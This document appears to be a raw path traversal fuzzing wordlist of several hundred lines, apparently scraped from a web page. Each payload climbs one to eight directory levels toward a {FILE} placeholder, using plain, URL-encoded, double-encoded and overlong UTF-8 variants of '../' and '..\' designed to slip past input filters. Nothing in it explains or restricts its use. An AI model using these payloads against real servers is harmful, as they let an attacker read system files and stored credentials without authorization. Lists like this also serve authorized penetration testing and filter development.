%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
